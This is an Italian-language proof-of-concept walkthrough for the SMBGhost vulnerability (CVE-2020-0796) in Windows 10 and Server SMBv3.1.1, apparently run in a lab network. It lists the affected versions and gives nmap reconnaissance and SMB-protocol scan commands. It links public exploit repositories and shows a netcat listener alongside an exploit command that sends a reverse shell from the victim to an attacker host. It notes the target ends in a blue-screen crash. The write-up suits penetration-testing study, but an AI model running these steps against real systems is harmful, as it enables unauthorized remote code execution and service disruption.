
Exploit proof-of-concept per CVE-2020-0796 (SMBGhost) che prende di mira Windows 10/Server SMBv3.1.1. Include ricognizione con Nmap, scansione delle vulnerabilità e consegna di payload per reverse shell.
**- Versioni interessate*
- Windows 10 Versione 1903 per sistemi a 32 bit
- Windows 10 Versione 1903 per sistemi basati su ARM64
- Windows 10 Versione 1903 per sistemi basati su x64
- Windows 10 Versione 1909 per sistemi a 32 bit
- Windows 10 Versione 1909 per sistemi basati su ARM64
- Windows 10 Versione 1909 per sistemi basati su x64
- Windows Server, versione 1903 (installazione Server Core)
- Windows Server, versione 1909 (installazione Server Core)

Avviare Nmap per scansionare la rete nella zona DMZ
map -sS 192.168.116.0/24
nmap: è il nome del programma di scansione di rete.
-sS: Seleziona il metodo di scansione TCP SYN scan. In questa scansione, Nmap invia un pacchetto SYN all'host di destinazione e osserva la risposta. Se l'host di destinazione risponde con un pacchetto SYN-ACK, Nmap sa che la porta è aperta. Se l'host di destinazione risponde con un pacchetto RST, significa che la porta è chiusa.
192.168.116.0/24: Indirizzo IP o intervallo di indirizzi IP specifico che si desidera scansionare. In questo caso, l'intervallo è 192.168.116.0/24, che descrive tutti gli indirizzi IP da 192.168.116.1 a 192.168.116.254.

=> Si osserva che l'indirizzo IP della macchina vittima 192.116.145 ha la porta 445 aperta.
· Utilizzare Nmap per scansionare le vulnerabilità sulla macchina vittima
map -p445 –script smb-protocols 192.168.116.145
nmap: è il nome del programma di scansione di rete.
-p445: Specifica la porta da scansionare, in questo caso la porta 445. La porta 445 è comunemente utilizzata per comunicare con il servizio SMB (Server Message Block) sui sistemi Windows.
--script smb-protocols: Seleziona lo script smb-protocols per eseguire la scansione. Questo script aiuta a controllare e visualizzare le informazioni sulle versioni del protocollo SMB supportate sull'host di destinazione.
192.168.116.145: Indirizzo IP dell'host che si desidera scansionare. In questo caso, l'indirizzo IP è 192.168.116.145.

- Il risultato ottenuto da smb-protocols sulla macchina vittima indica una possibile vulnerabilità sfruttabile in SMBv3.1.1.
- Per maggiore certezza, si continua a verificare la possibilità di sfruttare la vulnerabilità CVE-2020-0796 eseguendo uno script Python.
[]: -https://github.com/ly4k/SMBGhost "codice exploit"

=> Risultato Vulnerabile -> rilevata vulnerabilità CVE-2020-0796 sfruttabile sulla macchina vittima.
Eseguire l'attacco Reverse_shell
ncat -lvp 4444
[]: https://github.com/jamf/CVE-2020-0796-RCE-POC "codice exploit"
python SMBleedingGhost.py 192.168.116.145 192.168.44.3 4444

=> RISULTATO: La macchina attaccante ha ottenuto l'esecuzione del codice shell sulla macchina vittima.

Dopo una connessione riuscita, l'attaccante può sfruttare ed eseguire codice arbitrario sulla macchina vittima con i diritti dell'utente nella sessione di connessione.
Alla fine della sessione. La macchina vittima subisce un errore BlueScreen e si riavvia automaticamente.

*L'esecuzione dell'exploit potrebbe causare danni al sistema di destinazione*